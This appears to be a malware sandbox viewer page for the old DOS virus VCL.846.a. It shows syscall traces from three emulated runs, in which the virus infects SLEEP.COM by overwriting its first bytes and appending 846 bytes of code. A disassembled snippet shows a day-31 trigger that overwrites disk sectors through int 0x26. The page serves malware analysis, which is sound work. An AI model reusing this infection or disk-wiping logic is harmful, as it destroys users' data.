Sample viewer

vx.netlux.org/Virus.DOS.VCL.846.a

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:43:16.36005362Z	47	PC: 12a69 \| Get disk transfer address
2018-12-17T22:43:16.361941276Z	26	PC: 12a71 \| Set disk transfer address
2018-12-17T22:43:16.363074564Z	42	PC: 12a75 \| Get date 0x12a75: cmp dl, 0x1f 0x12a78: je 0x12a7d 0x12a7a: jmp 0x12a9b 0x12a7c: nop 0x12a7d: pushf 0x12a7e: mov al, 2 0x12a80: mov cx, 0x2ce 0x12a83: mov dx, 1 0x12a86: mov bx, 0x2e8 0x12a89: int 0x26 0x12a8b: popf 0x12a8c: mov ah, 9 0x12a8e: mov dx, 0x2e8 0x12a91: int 0x21 0x12a93: jmp 0x12a96 0x12a95: nop 0x12a96: mov ax, 0x4c00 0x12a99: int 0x21 0x12a9b: call 0x12ab4 0x12a9e: pop dx
2018-12-17T22:43:16.364992586Z	71	PC: 12acc \| Get current directory
2018-12-17T22:43:16.368524019Z	59	PC: 12ae9 \| Change current directory
2018-12-17T22:43:16.376059783Z	47	PC: 12b62 \| Get disk transfer address
2018-12-17T22:43:16.377510107Z	26	PC: 12b71 \| Set disk transfer address
2018-12-17T22:43:16.378968526Z	78	PC: 12b79 \| Find first file
2018-12-17T22:43:16.386917575Z	47	PC: 12b91 \| Get disk transfer address
2018-12-17T22:43:16.389053016Z	61	PC: 12baa \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:43:16.396291601Z	63	PC: 12bb6 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:43:16.403887698Z	66	PC: 12bbe \| Move file pointer
2018-12-17T22:43:16.40570442Z	62	PC: 12bc3 \| Close file
2018-12-17T22:43:16.407757446Z	67	PC: 12be3 \| Get or set file attributes
2018-12-17T22:43:16.426789562Z	61	PC: 12be8 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:43:16.433853038Z	64	PC: 12bf4 \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:43:16.437272921Z	66	PC: 12bfc \| Move file pointer
2018-12-17T22:43:16.440431574Z	64	PC: 12da8 \| Write file or device (Write 846 bytes on handle 5)
2018-12-17T22:43:16.450816439Z	87	PC: 12c0c \| Get or set file date and time
2018-12-17T22:43:16.452748898Z	62	PC: 12c10 \| Close file
2018-12-17T22:43:16.461454789Z	67	PC: 12c1d \| Get or set file attributes
2018-12-17T22:43:16.473265962Z	26	PC: 12b8b \| Set disk transfer address
2018-12-17T22:43:16.47474515Z	59	PC: 12b02 \| Change current directory
2018-12-17T22:43:16.479468312Z	26	PC: 12aa3 \| Set disk transfer address
2018-12-17T22:43:16.481995177Z	76	PC: 12a46 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7826,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:02:48.602003194Z	47	PC: 12a69 \| Get disk transfer address
2018-12-25T12:02:48.603113038Z	26	PC: 12a71 \| Set disk transfer address
2018-12-25T12:02:48.60486958Z	42	PC: 12a75 \| Get date 0x12a75: cmp dl, 0x1f 0x12a78: je 0x12a7d 0x12a7a: jmp 0x12a9b 0x12a7c: nop 0x12a7d: pushf 0x12a7e: mov al, 2 0x12a80: mov cx, 0x2ce 0x12a83: mov dx, 1 0x12a86: mov bx, 0x2e8 0x12a89: int 0x26 0x12a8b: popf 0x12a8c: mov ah, 9 0x12a8e: mov dx, 0x2e8 0x12a91: int 0x21 0x12a93: jmp 0x12a96 0x12a95: nop 0x12a96: mov ax, 0x4c00 0x12a99: int 0x21 0x12a9b: call 0x12ab4 0x12a9e: pop dx
2018-12-25T12:02:48.60815092Z	71	PC: 12acc \| Get current directory
2018-12-25T12:02:48.611884012Z	59	PC: 12ae9 \| Change current directory
2018-12-25T12:02:48.619191162Z	47	PC: 12b62 \| Get disk transfer address
2018-12-25T12:02:48.621355744Z	26	PC: 12b71 \| Set disk transfer address
2018-12-25T12:02:48.622543756Z	78	PC: 12b79 \| Find first file
2018-12-25T12:02:48.629576495Z	47	PC: 12b91 \| Get disk transfer address
2018-12-25T12:02:48.630835103Z	61	PC: 12baa \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:48.644895161Z	63	PC: 12bb6 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:02:48.652856978Z	66	PC: 12bbe \| Move file pointer
2018-12-25T12:02:48.655773614Z	62	PC: 12bc3 \| Close file
2018-12-25T12:02:48.658233732Z	67	PC: 12be3 \| Get or set file attributes
2018-12-25T12:02:48.680707339Z	61	PC: 12be8 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:48.689646955Z	64	PC: 12bf4 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:02:48.692391833Z	66	PC: 12bfc \| Move file pointer
2018-12-25T12:02:48.694060091Z	64	PC: 12da8 \| Write file or device (Write 846 bytes on handle 5)
2018-12-25T12:02:48.706037635Z	87	PC: 12c0c \| Get or set file date and time
2018-12-25T12:02:48.70850545Z	62	PC: 12c10 \| Close file
2018-12-25T12:02:48.722883649Z	67	PC: 12c1d \| Get or set file attributes
2018-12-25T12:02:48.736766401Z	26	PC: 12b8b \| Set disk transfer address
2018-12-25T12:02:48.738079975Z	59	PC: 12b02 \| Change current directory
2018-12-25T12:02:48.742597311Z	26	PC: 12aa3 \| Set disk transfer address
2018-12-25T12:02:48.744518433Z	76	PC: 12a46 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":31,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7826,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:02:48.733465399Z	47	PC: 12a69 \| Get disk transfer address
2018-12-25T12:02:48.734788563Z	26	PC: 12a71 \| Set disk transfer address
2018-12-25T12:02:48.736782813Z	42	PC: 12a75 \| Get date 0x12a75: cmp dl, 0x1f 0x12a78: je 0x12a7d 0x12a7a: jmp 0x12a9b 0x12a7c: nop 0x12a7d: pushf 0x12a7e: mov al, 2 0x12a80: mov cx, 0x2ce 0x12a83: mov dx, 1 0x12a86: mov bx, 0x2e8 0x12a89: int 0x26 0x12a8b: popf 0x12a8c: mov ah, 9 0x12a8e: mov dx, 0x2e8 0x12a91: int 0x21 0x12a93: jmp 0x12a96 0x12a95: nop 0x12a96: mov ax, 0x4c00 0x12a99: int 0x21 0x12a9b: call 0x12ab4 0x12a9e: pop dx
2018-12-25T12:02:48.740102717Z	9	PC: 12a93 \| Display string (Could not find end pointer)
2018-12-25T12:02:48.757125483Z	76	PC: 12a9b \| Terminate with return code (Return code = '0')